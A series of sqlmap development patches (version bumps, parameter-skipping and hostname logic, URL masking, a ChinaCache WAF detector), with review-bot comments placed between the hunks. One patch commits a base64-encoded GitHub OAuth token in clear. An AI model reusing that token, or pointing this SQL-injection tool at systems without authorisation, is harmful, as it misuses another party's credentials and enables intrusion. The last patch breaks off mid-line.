 from lib.core.exception import SqlmapValueException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.settings import ASP_NET_CONTROL_REGEX
+from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import EMPTY_FORM_FIELDS_REGEX
 from lib.core.settings import IGNORE_PARAMETERS
@@ -510,7 +511,7 @@ def start():
 logger.info(infoMsg)
 # Ignore session-like parameters for --level < 4
- elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
+ elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or any(_ in parameter.lower() for _ in CSRF_TOKEN_PARAMETER_INFIXES) or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
 testSqlInj = False
 infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 010aed678b5..fb7617d35cf 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.10.33"
+VERSION = "1.2.10.34"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
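Review bot: The condition in the second controller.py hunk now also skips parameters whose name contains one of `CSRF_TOKEN_PARAMETER_INFIXES`, but the comment above it still reads `# Ignore session-like parameters for --level < 4`; update it to `# Ignore session-like and anti-CSRF-token-like parameters for --level < 4` so the new skip is discoverable. The added check compares against `parameter.lower()` while the neighbouring tests use `parameter.upper()`, so it silently relies on the infixes being lower-case; a short comment stating that, or lower-casing both sides, would protect it from a later edit to the constant. `start()` starts and ends outside the hunk.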
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c46e2c753c5..cc3269e5001 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py fab20cff41611d4fcb4e426e2c7704da lib/controller/checks.py -250d3cf5ea54b8fe1e91fd611b0044ab lib/controller/controller.py +dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 97a0f363bfc33a5ee4853cdf91515423 lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0114b3012ea0ce300cf6ea339e8d54ef lib/core/settings.py +6a4002715dd3a6e636aee4b6b081c583 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py From 1e7dfe11b4cb6a155ee1e7390441e832727945c6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 23:38:37 +0200 Subject: [PATCH 341/428] Fixes #3318 --- lib/core/option.py | 11 ----------- lib/core/settings.py | 2 +- lib/core/target.py | 5 +++++ txt/checksum.md5 | 6 +++--- 4 files changed, 9 insertions(+), 15 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index d033ffdeb10..379eed0ddc0 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -45,7 +45,6 @@ from lib.core.common import openFile from lib.core.common import parseRequestFile from lib.core.common import parseTargetDirect -from lib.core.common import parseTargetUrl from lib.core.common import paths from lib.core.common import randomStr from lib.core.common import readCachedFileContent 
@@ -104,7 +103,6 @@ from lib.core.settings import DEFAULT_TOR_HTTP_PORTS from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS from lib.core.settings import DUMMY_URL -from lib.core.settings import INJECT_HERE_REGEX from lib.core.settings import IS_WIN from lib.core.settings import KB_CHARS_BOUNDARY_CHAR from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET @@ -1533,14 +1531,6 @@ def _cleanupOptions(): if conf.optimize: setOptimize() - match = re.search(INJECT_HERE_REGEX, conf.data or "") - if match: - kb.customInjectionMark = match.group(0) - - match = re.search(INJECT_HERE_REGEX, conf.url or "") - if match: - kb.customInjectionMark = match.group(0) - if conf.os: conf.os = conf.os.capitalize() @@ -2486,7 +2476,6 @@ def init(): _resolveCrossReferences() _checkWebSocket() - parseTargetUrl() parseTargetDirect() if any((conf.url, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.requestFile, conf.googleDork, conf.liveTest)): diff --git a/lib/core/settings.py b/lib/core/settings.py index fb7617d35cf..1d87a2806ba 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.34" +VERSION = "1.2.10.35" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 66f237dc87b..2a6926816f3 100644 --- a/lib/core/target.py +++ b/lib/core/target.py 
@@ -52,9 +52,11 @@ from lib.core.option import _setAuthCred from lib.core.settings import ASTERISK_MARKER from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES +from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import HOST_ALIASES from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX +from lib.core.settings import INJECT_HERE_REGEX from lib.core.settings import JSON_RECOGNITION_REGEX from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX from lib.core.settings import MULTIPART_RECOGNITION_REGEX @@ -752,6 +754,9 @@ class _(unicode): setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original) kb.postSpaceToPlus = '+' in original + match = re.search(INJECT_HERE_REGEX, conf.data or "") or re.search(INJECT_HERE_REGEX, conf.url or "") + kb.customInjectionMark = match.group(0) if match else CUSTOM_INJECTION_MARK_CHAR + def setupTargetEnv(): _createTargetDirs() _setRequestParams() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cc3269e5001..2ce719f56d3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
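Review bot: The marker search added after `kb.postSpaceToPlus` lets a match in `conf.data` win over one in `conf.url` because of the short-circuiting `or`, whereas the option.py code removed in this same commit searched data first and then let the url result overwrite it; if `INJECT_HERE_REGEX` can match more than one spelling of the marker, the value stored in `kb.customInjectionMark` differs when both carry one. A one-line comment stating the intended precedence would settle it, e.g. `# a marker in the request body takes precedence over one in the URL`. The enclosing function starts and ends outside the hunk, and the surrounding `conf.data` handling suggests this may sit under a data-only guard, so please confirm it still runs for URL-only targets.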
@@ -42,17 +42,17 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -2f2b2286f82028cf36ace9be3af06bf9 lib/core/option.py +18f33e43a09f5d682b92ca63baacd531 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6a4002715dd3a6e636aee4b6b081c583 lib/core/settings.py +31e606e7847cb86495bde3d5d0b18e8a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py +721198b5be72c8015a02acb116532a1f lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py cd0067d1798e45f422ce44b98baf57db lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From ba1b4c50be9bde330983be48767f86d7ee3a548c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 23:40:08 +0200 Subject: [PATCH 342/428] Trivial cleanup --- lib/core/settings.py | 2 +- plugins/dbms/h2/fingerprint.py | 3 --- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1d87a2806ba..73ff938cb5e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.35" +VERSION = "1.2.10.36" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/h2/fingerprint.py b/plugins/dbms/h2/fingerprint.py index c2a90521c37..ba36ec1a810 100644 --- a/plugins/dbms/h2/fingerprint.py +++ b/plugins/dbms/h2/fingerprint.py @@ -5,11 +5,8 @@ See the file 'LICENSE' for copying permission """ -import re - from lib.core.common import Backend from lib.core.common import Format -from lib.core.common import unArrayizeValue from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2ce719f56d3..00c2a7fc11b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -31e606e7847cb86495bde3d5d0b18e8a lib/core/settings.py +12fb6b20891ff3949db01fa2c1c1286a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py 
@@ -143,7 +143,7 @@ c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 79c44d8d0dffc140d38796a32e92a66a plugins/dbms/h2/connector.py 5b99e9a60409f54a140747ce1ca0342f plugins/dbms/h2/enumeration.py 36522c36650afc43c1166ab68b297ecb plugins/dbms/h2/filesystem.py -4fe530d10b74210bd045205d9318b5d6 plugins/dbms/h2/fingerprint.py +83255ebf7b1d23a408f0c68a7fa63422 plugins/dbms/h2/fingerprint.py 1de698e4cfddd754ffe31ea2640a481a plugins/dbms/h2/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/h2/syntax.py af746ef421cfefedc1aaa9dca1503de2 plugins/dbms/h2/takeover.py From ef52ee977fe43851c0b6549bb0e14db3e2426944 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 27 Oct 2018 14:14:21 +0200 Subject: [PATCH 343/428] Minor patch --- lib/core/common.py | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index da760545802..69c4014677d 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3481,6 +3481,9 @@ def maskSensitiveData(msg): for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)(?= -?-[a-z]|\Z)", retVal): retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) + # Fail-safe substitution + retVal = re.sub(r"(?i)\bhttps?://[^ ]+", lambda match: '*' * len(match.group(0)), retVal) + if getpass.getuser(): retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), '*' * len(getpass.getuser()), retVal) diff --git a/lib/core/settings.py b/lib/core/settings.py index 73ff938cb5e..68d761779d2 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
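Review bot: The fail-safe pattern `r"(?i)\bhttps?://[^ ]+"` stops only at a space, so a URL followed by a tab or newline has those characters masked along with it, and one at the end of a quoted option value (`--url="http://..."`) leaves the closing quote inside the asterisks. Using `\S+` instead of `[^ ]+` covers the whitespace cases without changing the intent; trailing punctuation would need a narrower class. The replacement keeps the original length, which is consistent with the `-u/--data/--cookie` masking just above, and `maskSensitiveData` starts outside the hunk.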
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.36" +VERSION = "1.2.10.37" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 00c2a7fc11b..f823b935845 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -ce7fb7270b104f05d1e2be088b69c976 lib/core/common.py +d20b9dd6097701b08153e80dc9b7eec6 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -12fb6b20891ff3949db01fa2c1c1286a lib/core/settings.py +07e1402306b18144c9a4d2e1e43ce9d0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From 703b7079a47c69ebefd27ada38b303d9b181f250 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 27 Oct 2018 14:30:28 +0200 Subject: [PATCH 344/428] Fixes #3319 --- lib/core/option.py | 9 +++++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 12 insertions(+), 3 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 379eed0ddc0..1f37b48e9b6 100644 --- a/lib/core/option.py +++ b/lib/core/option.py 
@@ -1367,6 +1367,14 @@ def _setHTTPCookies(): conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie)) +def _setHostname(): + """ + Set value conf.hostname + """ + + if conf.url: + conf.hostname = urlparse.urlsplit(conf.url).netloc.split(':')[0] + def _setHTTPTimeout(): """ Set the HTTP timeout @@ -2479,6 +2487,7 @@ def init(): parseTargetDirect() if any((conf.url, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.requestFile, conf.googleDork, conf.liveTest)): + _setHostname() _setHTTPTimeout() _setHTTPExtraHeaders() _setHTTPCookies() diff --git a/lib/core/settings.py b/lib/core/settings.py index 68d761779d2..69dd4a67e72 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.37" +VERSION = "1.2.10.38" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f823b935845..51d66d01763 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
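Review bot: `urlparse.urlsplit(conf.url).netloc.split(':')[0]` in the new `_setHostname` returns the wrong value when the netloc carries userinfo or an IPv6 literal: for `http://user:pw@host/` it yields `user`, and for `http://[::1]:8080/` it yields `[`. `urlsplit` already strips both, so `conf.hostname = urlparse.urlsplit(conf.url).hostname` is the robust form (note that it lowercases the name). The docstring `Set value conf.hostname` could also state that only the host part is stored, without port or credentials.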
@@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -18f33e43a09f5d682b92ca63baacd531 lib/core/option.py +d6dace6468ed5d2bbd500b0a244a9650 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -07e1402306b18144c9a4d2e1e43ce9d0 lib/core/settings.py +dc1382ae6b5899619d11d972435c6bd2 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From cc4833429fedf31f719ad8822f884a1deac5bf5a Mon Sep 17 00:00:00 2001 From: Syed Afzal Date: Mon, 29 Oct 2018 14:21:18 +0530 Subject: [PATCH 345/428] added china cache (#3326) --- waf/chinacache.py | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 waf/chinacache.py diff --git a/waf/chinacache.py b/waf/chinacache.py new file mode 100644 index 00000000000..aaac5c751b4 --- /dev/null +++ b/waf/chinacache.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "China Cache" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + page, headers, code = get_page(get=vector) + retval = headers.get("Powered-By-ChinaCache") is not None + + if retval: + break + + return retval \ No newline at end of file 
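Review bot: The first element `page` in `page, headers, code = get_page(get=vector)` is never read, and the file ends without a trailing newline (`\ No newline at end of file`), which will show up as noise in every later diff of this file. Binding it as `_, headers, code = get_page(get=vector)` and adding the final newline keeps the script tidy.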
From db5ae9ae0bb871a157482ba48d0dfd37fc26f6f8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 29 Oct 2018 09:55:14 +0100 Subject: [PATCH 346/428] Minor update to #3326 (adding generic code >= 400) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 3 ++- waf/chinacache.py | 7 ++----- 3 files changed, 5 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 69dd4a67e72..bb05f2f6c19 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.38" +VERSION = "1.2.10.39" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 51d66d01763..d0cd89427a3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dc1382ae6b5899619d11d972435c6bd2 lib/core/settings.py +052f65076ec02852b0035f1ac0d20240 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -408,6 +408,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 44f724ab7d333397975fecdf7e50be56 waf/bigip.py 6a2834daf767491d3331bd31e946d540 waf/binarysec.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py +c52c6974c0dae6815f27cfdee6121d7b waf/chinacache.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py a1d16d7106c9c66072aa58530c288515 waf/cloudflare.py 
diff --git a/waf/chinacache.py b/waf/chinacache.py index aaac5c751b4..d4d2d5aaebb 100644 --- a/waf/chinacache.py +++ b/waf/chinacache.py @@ -5,19 +5,16 @@ See the file 'doc/COPYING' for copying permission """ -import re - -from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS -__product__ = "China Cache" +__product__ = "ChinaCache (ChinaCache Networks)" def detect(get_page): retval = False for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) - retval = headers.get("Powered-By-ChinaCache") is not None + retval = code >= 400 and headers.get("Powered-By-ChinaCache") is not None if retval: break From 130879fbf3d1bfd98ede81d595c66314a8835082 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 30 Oct 2018 10:37:39 +0100 Subject: [PATCH 347/428] Minor patches --- lib/core/settings.py | 4 ++-- sqlmap.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index bb05f2f6c19..049c275a8d1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.39" +VERSION = "1.2.10.40" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -593,7 +593,7 @@ FORCE_COOKIE_EXPIRATION_TIME = "9999999999" # Github OAuth token used for creating an automatic Issue for unhandled exceptions -GITHUB_REPORT_OAUTH_TOKEN = "NTMyNWNkMmZkMzRlMDZmY2JkMmY0MGI4NWI0MzVlM2Q5YmFjYWNhYQ==" +GITHUB_REPORT_OAUTH_TOKEN = "NTYzYjhmZWJjYzc0Njg2ODJhNzhmNDg1YzM0YzlkYjk3N2JiMzE3Nw==" # Skip unforced HashDB flush requests below the threshold number of cached items HASHDB_FLUSH_THRESHOLD = 32 
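Review bot: The detection now requires `code >= 400` together with a `Powered-By-ChinaCache` header, but `headers.get("Powered-By-ChinaCache")` is only case-insensitive if `headers` is a case-insensitive mapping; with a plain dict a server answering `powered-by-chinacache` is missed. I cannot see the type `get_page` returns from here, so worth confirming and, if needed, normalising via `any(key.lower() == "powered-by-chinacache" for key in headers)`. `page` remains unused in the tuple unpacking; `_` would make that explicit.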
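Review bot: The replacement value on the `GITHUB_REPORT_OAUTH_TOKEN` line is a base64-encoded OAuth token committed in clear to the repository; the encoding is not protection, and the previous value stays readable in history. Anyone with a copy of the source can use the token for whatever its scope allows, so the minimal scope is the only real defence here. A comment recording that expectation would help the next rotation, e.g. `# NOTE: token must be scoped to issue creation only; revoke the previous value whenever this is replaced`.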
diff --git a/sqlmap.py b/sqlmap.py index c8b9fc81f17..c6f6194d1bb 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -234,8 +234,8 @@ def main(): dataToStdout(excMsg) raise SystemExit - elif "ImportError" in excMsg: - errMsg = "invalid runtime environment ('%s')" % excMsg.split("ImportError: ")[-1].strip() + elif any(_ in excMsg for _ in ("ImportError", "Can't find file for module")): + errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() logger.critical(errMsg) raise SystemExit diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d0cd89427a3..bb2d1fb642f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -052f65076ec02852b0035f1ac0d20240 lib/core/settings.py +c0109f21b79e9867dede075afad9167f lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -234,7 +234,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -b84c70803012a374385ecc3e41a7e0dc sqlmap.py +ad5f9980c9bdca753578292720a5afe0 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From a4fdbf1343ca2805c91a2669f4f0fad4236f9433 Mon Sep 17 00:00:00 2001 
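Review bot: For the new `Can't find file for module` case the message may not contain the `Error: ` fragment, and `excMsg.split("Error: ")[-1]` then returns the entire `excMsg`, so the `invalid runtime environment ('%s')` line would carry the whole traceback text. Guarding on the fragment first, e.g. `detail = excMsg.split("Error: ")[-1].strip() if "Error: " in excMsg else excMsg.strip().splitlines()[-1]`, keeps the message to one line. `main()` starts outside the hunk, so I cannot see how `excMsg` is built.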
From: Miroslav Stampar Date: Tue, 30 Oct 2018 11:13:09 +0100 Subject: [PATCH 348/428] Patch related to the #3348 --- lib/core/settings.py | 2 +- lib/core/shell.py | 45 +++++++++++++++++++++++--------------------- txt/checksum.md5 | 4 ++-- 3 files changed, 27 insertions(+), 24 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 049c275a8d1..20013c7f427 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.40" +VERSION = "1.2.10.41" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/shell.py b/lib/core/shell.py index 7eeef4ee5c7..d9fb4f59091 100644 --- a/lib/core/shell.py +++ b/lib/core/shell.py 
@@ -53,30 +53,33 @@ def clearHistory(): readline.clear_history() def saveHistory(completion=None): - if not readlineAvailable(): - return - - if completion == AUTOCOMPLETE_TYPE.SQL: - historyPath = paths.SQL_SHELL_HISTORY - elif completion == AUTOCOMPLETE_TYPE.OS: - historyPath = paths.OS_SHELL_HISTORY - elif completion == AUTOCOMPLETE_TYPE.API: - historyPath = paths.API_SHELL_HISTORY - else: - historyPath = paths.SQLMAP_SHELL_HISTORY - try: - with open(historyPath, "w+"): + if not readlineAvailable(): + return + + if completion == AUTOCOMPLETE_TYPE.SQL: + historyPath = paths.SQL_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.OS: + historyPath = paths.OS_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.API: + historyPath = paths.API_SHELL_HISTORY + else: + historyPath = paths.SQLMAP_SHELL_HISTORY + + try: + with open(historyPath, "w+"): + pass + except: pass - except: - pass - readline.set_history_length(MAX_HISTORY_LENGTH) - try: - readline.write_history_file(historyPath) - except IOError, msg: - warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg) - logger.warn(warnMsg) + readline.set_history_length(MAX_HISTORY_LENGTH) + try: + readline.write_history_file(historyPath) + except IOError, msg: + warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg) + logger.warn(warnMsg) + except KeyboardInterrupt: + pass def loadHistory(completion=None): if not readlineAvailable(): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bb2d1fb642f..3a2d3b80eb6 100644 --- 